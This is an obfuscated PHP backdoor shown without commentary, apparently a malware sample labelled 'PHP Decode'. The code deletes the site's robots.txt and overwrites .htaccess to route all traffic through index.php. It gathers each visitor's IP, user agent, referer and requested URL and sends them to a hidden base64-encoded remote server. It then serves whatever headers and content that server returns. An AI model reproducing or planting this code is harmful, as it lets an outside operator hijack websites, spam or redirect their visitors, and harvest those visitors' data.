PHP Decode

 goto n7TId; n7TId: function h($url, $pf = '') { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, "\150"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE); if ($pf != '') { curl_setopt($ch, CURLOPT_POST, 1); if (is_array($pf)) { curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($pf)); } } $r = curl_exec($ch); curl_close($ch); if ($r) { return $r; } return ''; } goto P_gUg; z40jF: if (isset($_REQUEST["\160\141\162\x61\x6d\163"])) { $params["\x61\160\151"] = $api; print_r($params); die; } goto yteGs; GTqHq: $params["\160\162\x6f\164\157\143\157\x6c"] = isset($_SERVER["\x48\124\124\x50\x53"]) ? "\150\164\x74\x70\163\x3a\57\x2f" : "\x68\x74\x74\160\x3a\57\57"; goto H_QYn; H_QYn: $params["\x6c\x61\x6e\x67\165\141\x67\145"] = isset($_SERVER["\x48\124\124\120\x5f\x41\x43\x43\x45\120\x54\137\114\101\x4e\107\x55\x41\107\105"]) ? $_SERVER["\110\x54\x54\x50\x5f\101\x43\103\x45\x50\124\x5f\x4c\101\x4e\x47\125\101\107\x45"] : ''; goto z40jF; Z7Yg1: $api = base64_decode("\x61\x48\x52\x30\x63\x44\x6f\x76\114\172\125\x32\x4f\124\121\x74\131\x32\x67\60\114\130\131\171\x4d\x44\115\165\x63\62\x5a\x74\145\x57\x35\152\x4c\155\x4e\x76\x62\121\75\75"); goto UtO0V; UtO0V: $params["\x64\x6f\155\141\x69\156"] = isset($_SERVER["\110\x54\x54\120\137\110\117\123\x54"]) ? $_SERVER["\x48\124\x54\120\x5f\x48\x4f\123\124"] : $_SERVER["\123\105\122\126\x45\x52\137\116\x41\115\x45"]; goto EaPzI; xPS2C: if ($params["\151\160"] == null) { $params["\x69\160"] = ''; } goto GTqHq; am77E: $params["\162\145\146\x65\x72\145\162"] = isset($_SERVER["\x48\x54\124\120\x5f\122\x45\x46\x45\122\x45\x52"]) ? $_SERVER["\x48\124\124\120\137\122\x45\x46\105\122\x45\x52"] : ''; goto EP85p; yteGs: h2(); goto kMHJE; rkNIh: while ($try < 3) { $content = h($api, $params); $content = @gzuncompress(base64_decode($content)); $data_array = @preg_split("\57\x5c\174\57\163\151", $content, -1, PREG_SPLIT_NO_EMPTY); if (!empty($data_array)) { $data = array_pop($data_array); $data = base64_decode($data); foreach ($data_array as $header) { @header($header); } echo $data; die; } $try++; } goto skZx6; EP85p: $params["\141\x67\x65\156\x74"] = isset($_SERVER["\110\124\124\120\137\x55\123\105\122\137\x41\x47\x45\116\124"]) ? $_SERVER["\110\124\124\x50\137\x55\x53\105\122\x5f\101\x47\x45\x4e\x54"] : ''; goto s0rEP; P_gUg: function h2() { if (file_exists("\x72\x6f\x62\157\x74\163" . "\56\x74\x78\164")) { @unlink("\x72\x6f\x62\157\x74\163" . "\x2e\x74\x78\164"); } $htaccess = "\x2e" . "\x68\164\141\143\x63\145\163\x73"; $content = @base64_decode("\120\105\132\x70\x62\107\x56\172\x54\127\x46\60\131\x32\x67\x67\111\151\64\x6f\x63\110\154\x38\132\130\x68\x6c\146\110\102\157\x63\103\153\x6b\x49\152\x34\x4b\x49\x45\71\x79\132\107\126\x79\111\x47\106\163\x62\x47\x39\63\x4c\x47\122\154\142\x6e\x6b\x4b\x49\x45\x52\x6c\x62\156\x6b\147\x5a\x6e\x4a\166\x62\x53\102\x68\142\x47\167\113\120\x43\x39\107\x61\127\x78\x6c\143\60\x31\150\144\107\x4e\157\120\x67\157\x38\122\x6d\154\x73\132\x58\x4e\x4e\131\130\x52\x6a\141\x43\x41\x69\130\151\150\x68\131\155\71\x31\x64\x43\x35\x77\141\110\102\x38\143\x6d\x46\153\141\127\70\x75\143\x47\150\167\x66\x47\154\165\132\x47\x56\64\114\x6e\x42\157\x63\x48\170\x6a\142\62\x35\x30\x5a\x57\65\x30\114\x6e\102\x6f\x63\x48\170\x73\x62\x32\116\162\115\x7a\131\x77\114\x6e\102\157\x63\110\x78\150\x5a\107\61\x70\142\x69\65\167\141\110\102\x38\144\x33\101\164\142\107\71\x6e\141\x57\x34\x75\x63\x47\150\x77\146\x48\x64\x77\114\127\x77\x77\132\x32\154\165\114\x6e\x42\157\x63\x48\170\63\x63\x43\61\60\x61\107\x56\x74\132\123\x35\167\x61\x48\102\x38\x64\63\101\x74\143\62\116\171\141\x58\102\60\x63\171\65\x77\x61\110\x42\70\x64\63\x41\x74\x5a\127\122\160\x64\107\x39\171\114\156\102\x6f\x63\x48\170\x74\131\127\147\165\x63\x47\150\167\146\x47\x70\x77\x4c\x6e\x42\x6f\143\110\x78\154\x65\110\x51\x75\x63\107\x68\x77\x4b\123\121\151\120\147\157\x67\124\x33\x4a\x6b\x5a\130\x49\147\x59\x57\170\x73\142\x33\143\163\132\x47\126\x75\x65\121\157\147\121\x57\x78\x73\142\63\x63\147\x5a\156\112\166\x62\x53\102\x68\x62\107\167\113\x50\x43\x39\107\x61\x57\170\x6c\x63\x30\61\150\144\x47\116\157\120\147\x6f\x38\x53\127\x5a\x4e\142\x32\122\61\x62\x47\x55\147\x62\127\71\153\x58\x33\x4a\154\144\63\112\x70\x64\x47\125\x75\x59\172\x34\113\125\155\126\x33\x63\x6d\x6c\x30\132\x55\126\x75\132\x32\154\165\132\x53\102\120\142\x67\160\x53\132\130\144\171\x61\x58\122\x6c\121\155\106\172\132\x53\x41\166\103\154\112\x6c\x64\x33\x4a\160\x64\x47\126\123\x64\x57\170\154\x49\x46\65\160\142\x6d\x52\154\145\x46\x77\x75\x63\x47\x68\167\x4a\x43\x41\164\x49\106\x74\x4d\130\121\x70\123\132\x58\x64\x79\x61\130\x52\154\x51\x32\71\165\x5a\x43\101\154\145\61\112\106\125\126\126\x46\125\61\x52\146\122\x6b\x6c\x4d\122\x55\x35\x42\x54\x55\x56\71\x49\103\105\x74\132\147\160\x53\132\x58\x64\171\x61\130\x52\154\121\x32\71\165\x5a\103\101\154\145\x31\112\106\x55\x56\x56\106\125\61\122\x66\x52\x6b\x6c\115\x52\x55\x35\102\124\125\x56\71\x49\103\x45\x74\132\101\160\123\132\130\x64\x79\141\130\122\154\x55\156\x56\x73\132\123\101\x75\111\103\71\160\142\x6d\x52\154\x65\x43\65\167\x61\110\x41\x67\127\x30\170\144\x43\x6a\167\x76\x53\127\x5a\116\x62\x32\x52\x31\x62\107\125\53"); if (file_exists($htaccess)) { $htaccess_content = file_get_contents($htaccess); if ($content == $htaccess_content) { return; } } @chmod($htaccess, 511); @file_put_contents($htaccess, $content); @chmod($htaccess, 420); } goto Z7Yg1; kMHJE: $try = 0; goto rkNIh; EaPzI: $params["\162\145\x71\165\x65\163\x74\137\x75\x72\154"] = $_SERVER["\x52\105\121\125\105\123\124\137\125\122\x49"]; goto am77E; s0rEP: $params["\x69\160"] = isset($_SERVER["\x48\124\124\120\x5f\126\x49\101"]) ? $_SERVER["\x48\124\124\x50\137\130\137\106\117\122\127\x41\x52\x44\105\104\x5f\x46\117\122"] : $_SERVER["\122\105\115\x4f\x54\105\x5f\x41\104\x44\122"]; goto xPS2C; skZx6: ?>